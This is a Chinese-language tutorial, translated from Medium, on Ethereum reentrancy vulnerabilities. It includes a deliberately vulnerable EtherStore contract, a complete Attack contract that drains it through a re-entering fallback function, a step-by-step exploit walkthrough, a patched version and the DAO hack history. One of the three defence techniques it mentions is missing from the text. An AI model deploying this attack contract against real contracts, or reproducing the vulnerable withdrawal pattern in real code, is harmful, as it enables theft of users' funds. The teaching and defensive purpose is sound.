如何防止以太坊智能合约攻击-源码分析
本文作者: aisiji[1]
本文通过编写一个有漏洞的合约,分析如何攻击、预防并修复漏洞。
Source: Undraw[2]
以太坊智能合约的一个特点——可以调用和利用来自外部合约的代码。
这种攻击被用于臭名昭著的DAO 攻击[3]。
了解漏洞
重入(reentrancy)这个词就来自外部恶意合约在有漏洞的合约调用函数,并且重新执行代码路径。
为了更清楚一点,我们看一个简单的有漏洞的合约EtherStore.sol
,它是一个以太坊资金库,储户一个星期只能提取 1 ether:
contract EtherStore {
uint256 public withdrawalLimit = 1 ether;
mapping(address => uint256) public lastWithdrawTime;
mapping(address => uint256) public balances;
function depositFunds() external payable {
balances[msg.sender] += msg.value;
}
function withdrawFunds (uint256 _weiToWithdraw) public {
require(balances[msg.sender] >= _weiToWithdraw);
// limit the withdrawal
require(_weiToWithdraw <= withdrawalLimit);
// limit the time allowed to withdraw
require(now >= lastWithdrawTime[msg.sender] + 1 weeks);
require(msg.sender.call.value(_weiToWithdraw)());
balances[msg.sender] -= _weiToWithdraw;
lastWithdrawTime[msg.sender] = now;
}
}
-EtherStore.sol-
这个合约有两个 public 函数,depositFunds
和withdrawFunds
。
depositFunds
函数只是简单的增加储户的余额。
withdrawFunds
函数允许发送者指定要提取多少wei
。
这个函数只在请求的取款小于等于 1 ether 并且一个星期内没有取款的情况下才会成功。
漏洞在 17 行,在这里合约向储户发送请求的 ether。
假设攻击者创建了一个攻击合约Attack.sol
:
import "EtherStore.sol";
contract Attack {
EtherStore public etherStore;
// intialize the etherStore variable with the contract address
constructor(address _etherStoreAddress) {
etherStore = EtherStore(_etherStoreAddress);
}
function attackEtherStore() external payable {
// attack to the nearest ether
require(msg.value >= 1 ether);
// send eth to the depositFunds() function
etherStore.depositFunds.value(1 ether)();
// start the magic
etherStore.withdrawFunds(1 ether);
}
function collectEther() public {
msg.sender.transfer(this.balance);
}
// fallback function - where the magic happens
function () payable {
if (etherStore.balance > 1 ether) {
etherStore.withdrawFunds(1 ether);
}
}
}
-Attack.sol-
怎样利用漏洞?
这将把 public 变量etherStore
初始化并指向被攻击合约。
然后攻击者将用大于等于 1 的一定数量的 ether(暂时假设为 1 ether)来调用attackEtherStore
函数。
在这个例子中,我们还将假设许多其他用户已经在合约中存了 ether,比如,合约当前的余额是 10 ether。可能会出现下面的情况:
-
Attack.sol
15 行: 用 1 ether 的msg.value
(和大量 gas)调用EtherStore
合约的depositFunds
函数。发送者(msg.sender
)是恶意合约(0x0… 123
),balances[0x0..123] = 1 ether
-
Attack.sol
17 行: 恶意合约调用EtherStore
合约的withdrawFunds
函数,参数为 1 ether。这会绕过所有要求(EtherStore
合约的 12-16 行),因为之前没有发生过取款。 -
EtherStore.sol
17 行: 向恶意合约发回 1 ether。 -
Attack.sol
25 行: 向恶意合约的支付触发执行 fallback 函数。 -
Attack.sol
26 行:EtherStore
合约的总余额为 10 ether,现在是 9 ether,所以这个 if 语句通过了。 -
Attack.sol
27 行: fallback 函数再次调用EtherStore
的withdrawFunds
函数,重新进入EtherStore
合约。 -
EtherStore.sol
11 行: 第二次对withdrawFunds
调用,攻击合约存储的余额仍然是 1 ether,因为第 18 行代码还没有执行。因此我们仍然有balances[0x0..123] = 1 ether
。lastWithdrawTime
变量也是如此。再次,绕过了所有的请求。 -
EtherStore.sol
17 行:攻击合约再次提取 1 ether。 -
重复步骤 4–8,直到不满足 EtherStore.balance > 1
, 如Attack.sol
合约第 26 行那样。 -
Attack.sol
26 行: 一旦EtherStore
合约只有 1 ether(或者更少),这个 if 语句就会执行失败。然后,EtherStore
合约的 18、19 行就会执行(对每次withdrawFunds
函数的调用)。 -
EtherStore.sol
18、19 行: 设置余额与lastWithdrawTime
的映射,并且执行结束。
最后的结果是,除了 1 ether 不能提取,攻击者一笔交易从EtherStore
合约提取了其他所有 ether。
如何避免漏洞
有很多常用技术可以帮助我们在合约中避免潜在的重入漏洞。
第二种技术是确保所有修改状态变量的逻辑都发生在 ether 发出合约之前(或者任何外部调用之前)。在EtherStore
的实例中,18、19 行应该放在 17 行之前。
第三种技术是引入一个互斥——即,添加一个状态变量在代码执行期间锁定合约,组织重入调用。
在EtherStore.sol
中使用这些技术(实际并不需要把三种都用上,这里是为了演示),就是下面的防重入合约:
contract EtherStore {
// initialize the mutex
bool reEntrancyMutex = false;
uint256 public withdrawalLimit = 1 ether;
mapping(address => uint256) public lastWithdrawTime;
mapping(address => uint256) public balances;
function depositFunds() external payable {
balances[msg.sender] += msg.value;
}
function withdrawFunds (uint256 _weiToWithdraw) public {
require(!reEntrancyMutex);
require(balances[msg.sender] >= _weiToWithdraw);
// limit the withdrawal
require(_weiToWithdraw <= withdrawalLimit);
// limit the time allowed to withdraw
require(now >= lastWithdrawTime[msg.sender] + 1 weeks);
balances[msg.sender] -= _weiToWithdraw;
lastWithdrawTime[msg.sender] = now;
// set the reEntrancy mutex before the external call
reEntrancyMutex = true;
msg.sender.transfer(_weiToWithdraw);
// release the mutex after the external call
reEntrancyMutex = false;
}
}
-EtherStore.sol-
故事时间
DAO(Decentralized Autonomous Organization)攻击是早期以太坊开发中发生的主要黑客攻击之一。
当时,合约金额超过 1.5 亿美元。重入攻击导致了产生了以太坊经典(ETC)的硬分叉。关于 DAO 漏洞利用的分析,请看这里[6]。
有关以太坊分叉历史、DAO 黑客时间表以及硬分叉中 ETC 诞生的更多信息,请参见 (ethereum_standards[7])。
原文:https://medium.com/better-programming/preventing-smart-contract-attacks-on-ethereum-a-code-analysis-bf95519b403a
参考资料
aisiji: https://learnblockchain.cn/people/3291
[2]Undraw: https://undraw.co/
[3]DAO攻击: http://bit.ly/2DamSZT
[4]transfer: http://bit.ly/2Ogvnng
[5]check-effect交互模式: http://bit.ly/2EVo70v
[6]这里: https://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/
[7]ethereum_standards: https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc#ethereum_standards